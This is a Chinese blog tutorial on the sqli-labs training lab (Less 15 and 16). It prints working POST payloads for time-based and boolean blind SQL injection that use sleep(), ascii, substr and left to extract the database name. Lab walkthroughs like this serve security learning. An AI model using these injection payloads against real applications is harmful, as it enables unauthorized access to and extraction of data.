15、延时布尔盲注(Post)

最新推荐文章于 2024-05-26 10:49:06 发布
最新推荐文章于 2024-05-26 10:49:06 发布
阅读量480 收藏
点赞数
分类专栏: 小课堂 文章标签: sqli-labs post 延迟 布尔 盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/103384639
版权

环境sqli-labs

less 15

1、首先我们抓包
在这里插入图片描述

2、测试注入
在 username 输入 1’ or 1=1#
在 password 输入 任意
所以用单引号闭合

3、我们构造语句
uname=admin’ and (select (if(length(database())>=8,sleep(5),null)))-- &passwd=2&submit=Submit
如果数据库的长度大于等于8多停留5秒,如果小于8什么都不操作
在这里插入图片描述
uname=admin’ and If(ascii(substr(database(),1,1))=115,sleep(1),sleep(5))#&passwd=11&submit=Submit
如果第一位是‘s’是多停留1秒,如果不是多停留5秒
uname=admin’and If(left(database(),1)=‘s’,1,sleep(5))#&passwd=11&submit=Submit

less 16

闭合是双引号和小括号(")),其他都一样

禁止非法,后果自负

欢迎关注公众号:
在这里插入图片描述

web安全工具库
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sql入之布尔延时以及原理
maluxiao123的博客
03-30 1227
之前已经简单介绍了sql入的基本原理,接下来会按照sql入的各种类型一一进行梳理,sql入的常见主要分为回显入、报错入、bool延时入、堆叠入、二次入、宽字节入、http头入、DNS LOAD入。 1.布尔 我们知道页面有回显可以确定回显位时可以进行回显入,而没有回显的话,有sql报错页面可以使用报错入,而一般设计完善的网站是会将sql报错的内容给屏蔽掉的。但是我们能判断页面是报错了,就算页面没有报错内容我们同样是有办法的,这时候我们可以使用的方式来进行入。 比如
SQL入--(布尔延时)
weixin_44940180的博客
08-07 1156
布尔延时的区别 首先,使用二者的前提是,在参数错误的情况下(例如:1’)不会返回报错信息 布尔:在正确与错误参数下,页面返回的信息有所不同 延时:不论输入正确或错误参数,页面没有明显区别 时间更像是布尔的升级,布尔的时候比较直观的变化 所以这个时候基于时间的,也就是在基于布尔上结合if判断和sleep()或benchmark()函数来得到一个时间上的变换延迟的参照,也就可以让我们进行一些判断 常使用的函数 length():确定字符长度 ascii():确定某个字
基于post方法的sql布尔模板
qq_37301470的博客
11-05 256
#记录下bugku中的一道布尔题目“sql入” import requests as req #Post 类型的bool #过滤了','没法用mid,substr,left 截取 试试substr(()from()for()) url="http://114.67.246.176:17306/" #bugku项目的url地址 s=req.session() #创建session对象 select="database()" select2="select group_concat(table_na
sqli-labs通关(1-20)
weixin_57827781的博客
05-18 1428
较为详细的介绍了sqli-labs靶场的操作以及实验过程,更好的学习sql
sql入_1-4_post
weixin_44110913的博客
12-04 1411
sql入_1-4_post 一.post概念 1.首先post和get一样,只是不会拼接到url中 2.post请求会向指定资源提交数据,请求服务器进行处理,如,表单提交,文件上传等,请求数据会包含在请求体中 3.使用post方法时,查询字符在post信息中单独存在,和http请求一起发送到服务器 二.实验 这里我们使用sqli less-15实验基于post时间和布尔 先...
POST基于时间和布尔
qq_43776408的博客
06-10 1001
HTTP POST介绍 也就是说POST提交的数据是在HTTP请求中 其实二者并没有区别 上图的倒数第二行是目的地址 最后一行是你要传递的参数的值 POST基于时间的 这个之前做过 我们使用Less-15为例 原sql语句为 select * from admin where username=‘name’ and password=‘pw’ limit 0,1 所以你在写的时候需要name‘ 语句 – 后面那个–用于释掉原sql语句的username后的name后的单引号 然后点击go,你会发
STC15系列万能delay延时函数.zip
03-08
STC15系列万能delay延时。为了方便51单片机在不同晶振频率下,延时函数能正常使用而打包的延时函数。改变频率后只需改变一下宏定义即可。 delay.h #ifndef _DELAY_H #define _DELAY_H //意时钟频率设置...
用于sql延时的脚本,比较初级
03-22
主要是通过使用Time.time()函数获取时间戳,然后对比发送请求后的时间戳,如果差距为延时设置的时间则表明符合条件,通过字典搜索该ASCII码对应的字符然后插入到输出的字符串中。 程序中使用时主要修改url,最终输出...
SQL利用工具
11-15
4. **布尔**:通过发送一系列可能导致不同结果的查询(例如,导致错误或不产生错误),然后分析应用程序的响应来推断信息。如果应用程序在处理错误时行为不同,那么攻击者可以利用这一点来获取信息。 5. **排序...
sql检测的简单脚本.zip
03-10
时间基是通过判断查询执行时间来确定结果,比如入一个延时操作,看系统响应时间是否改变。布尔则依赖于系统的返回状态,例如,通过观察“存在”或“不存在”的提示信息。 3. **检测方法**: - **异常...
Oracle用延时存过SLEEP
最新发布
06-20
调用 SLEEP(5) --代表延时5秒继续执行
布尔python脚本.zip
12-28
GET和POST型python脚本
(手工)【sqli-labs15-16】POST入:布尔/时间
07-07 990
【SQL-POST布尔/时间
高级Web安全测试:POST方式技术详解与实战案例
weixin_43822401的博客
05-26 392
技术要求攻击者在没有直接反馈的情况下,通过应用程序的行为变化来推断数据库的内部信息。这种技术通常用于那些对错误信息进行了严格处理的应用程序,使得普通的入手段无法获取有用信息。
两种CTF中特殊的总结
蚁景网安学院
02-04 932
知识点实操概要MySQL入中,3种方式:基于布尔、基于时间的、基于报错的。以此掌握原理!链接指路:https://www.hetianlab.com/expc.do...
POST基于时间和布尔
qq_60876907的博客
07-19 258
命令:uname=admin' and (select if (length(datebase()>5,sleep(5),null))) -- &passwd=admin&submit=Submit。存在入点POST提交的参数 + and if (length(datebase())>5,sleep(5),null).如果执行的时间页面响应时间大于5 秒,肯定存在入点,并且对应的SQL 语句执行。1,在存在入点POST提交的参数后加入 if 判断正确或者错误的语句。2,POST基于时间
SQL入篇 总汇
4ct10n
10-15 7217
最近看了一些习题,在这里想总结一下吧。其实可以代替任何入,但基本的入比简单。在这里我先解析几道的习题。 1. JSOJ的题目Simple Injection 1. 首先用wvs扫描器扫描网站 发现了sql漏洞 并且是sleep入 2. 利用给出的payload初步尝试/*'XOR(if(1,sleep(2),0))OR'*/ 确实有延迟效果,那么下面就是写代码了
SQL GET /POST布尔型,延时型Python脚本
小锤队长的博客
08-09 4290
以下脚本都用 sql-labs 中的题目进行测试: sql-labs 靶场:http://43.247.91.228:84/ 一,sql入之 GET传参 之 布尔型: import requests result = "" url_template = "http://43.247.91.228:84/Less-8/?id=2' and ascii(substr(({0}),{1...
POST基于时间与布尔
LoveStarbucks的博客
12-31 1564
POST基于时间与布尔 1.HTTP POST介绍 POST发送数据到服务器中,请求服务器处理(表单数据提交、文件上传) POST可能会创建新的资源或者修改现有资源 2.POST基于时间的 在存在入点POST提交的参数后加and if(length(database())>5,sleep(5),null) 如果执行的页面响应时间大于5秒,那么肯定就存在入,并且对应的SQL语句执行...
ctffhub 布尔
08-25
在进行布尔时,我们可以使用特殊的查询语句和延时函数来判断输入是否正确执行。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* *2* [SQL入:布尔...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值